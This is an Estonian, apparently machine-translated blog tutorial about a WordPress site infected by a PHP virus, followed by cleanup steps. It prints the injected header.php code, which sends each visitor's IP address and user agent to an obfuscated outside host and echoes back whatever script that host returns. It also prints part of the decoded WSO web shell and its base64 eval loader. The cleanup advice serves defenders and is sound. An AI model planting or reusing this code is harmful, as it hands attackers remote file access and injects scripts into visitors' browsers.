poolt
Eemaldage WordPress PHP viirus
Eemaldage WordPress PHP viirus
See õpetus tutvustab konkreetset juhtumit, kus WordPressi ajaveeb nakatus. Eemaldage WordPress PHP viirus.
sisu
Teisel päeval märkasin kahtlast koodi, mis näib olevat WordPressi PHP-viirus. Järgmine PHP kood oli olemas header.php, enne rida </head>.
<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>See on PHP-kood, mis näeb välja nagu prooviks hankida ressursi sisu välisest serverist, kuid URL-ile viitav osa on puudulik.
Töömehhanism on mõnevõrra keerulisem ja muudab selle WordPressi PHP viiruse mõjutatud saitide külastajatele nähtamatuks. Selle asemel sihib see otsingumootoreid (Google) ja toob kaudselt kaasa mõjutatud veebisaitide külastajate arvu olulise vähenemise.
WordPress PHP Virus pahavara üksikasjad
1. Ülaltoodud kood on olemas header.php.
2. Serverisse ilmus fail wp-log.php kaustas wp-includes.
3. wp-log.php sisaldab krüptitud koodi, kuid mida on suhteliselt lihtne dekrüpteerida.
<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>Dekrüpteerige pahavara kood wp-log.php :
<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("
<pre align=center-->
<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>Tundub, et tegemist on pahatahtliku PHP-skriptiga, mis sisaldab koodi autentimise ning serveri failide ja kataloogidega seotud toimingute haldamiseks. Väga lihtsalt on näha, et see skript sisaldab selliseid muutujaid nagu $auth_pass (autentimisparool), $default_action (vaiketoiming), $default_use_ajax (kasutades vaikimisi Ajaxi) ja $default_charset (tähemärgi vaikeseade).
Ilmselgelt on sellel skriptil jaotis, mis kontrollib HTTP kasutajaagendeid, et blokeerida juurdepääs teatud veebirobotidele, näiteks otsingumootoritele. Sellel on ka jaotis, mis kontrollib PHP turvarežiimi ja määrab teatud töökataloogid.
4. Kui brauseris avatakse aadress wp-log.php, ilmub veebileht väljaga autentimine. Esmapilgul näib see olevat failihaldur, mille kaudu saab uusi faile hõlpsasti sihtserverisse üles laadida.
Kas kasutate WordPressi veebisaiti?
Manuaalne viirusetõrjeprotsess hõlmab alati esmalt haavatavuse avastamist ja mõistmist.
1. Looge kogu veebisaidi jaoks varukoopia. See peab hõlmama nii faile kui ka andmebaasi.
2. Tehke kindlaks, kui kaua viirus on olnud, ja otsige veebiserverist ligikaudse aja jooksul muudetud või äsja loodud faile.
Näiteks kui soovite faile näha .php loodud või muudetud eelmisel nädalal, käivitage serveris käsk:
find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"See on lihtne meetod, mille abil saate avastada nakatunud WordPressi faile ja neid, mis sisaldavad pahavara koodi.
3. Kontrollige faili .htaccess kahtlastest juhistest. Õigused või skripti täitmisread.
4. Kontrollige andmebaasi. Väga võimalik, et mõnda WordPressi postitust ja lehte on redigeeritud pahavaraga või lisandub uusi administraatorirolliga kasutajad.
5. Kontrollige kaustade ja failide kirjutamisõigusi. chmod ja chown.
Soovitatavad õigused on: 644 failidele ja 755 kataloogidele.
find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;6. Värskendage kõik WordPress Plugins / WordPress Themes.
Seotud: Parandage ümbersuunamine WordPress Hack 2023 (viiruse ümbersuunamine)
Need on meetodid “põhilised” mille kaudu saate WordPressi veebisaidilt / ajaveebi viirusetõrjet teha. Kui teil on probleeme ja vajate abi, on kommentaaride jaotis avatud.
Eemaldage WordPress PHP viirus
Samuti võite olla huvitatud...
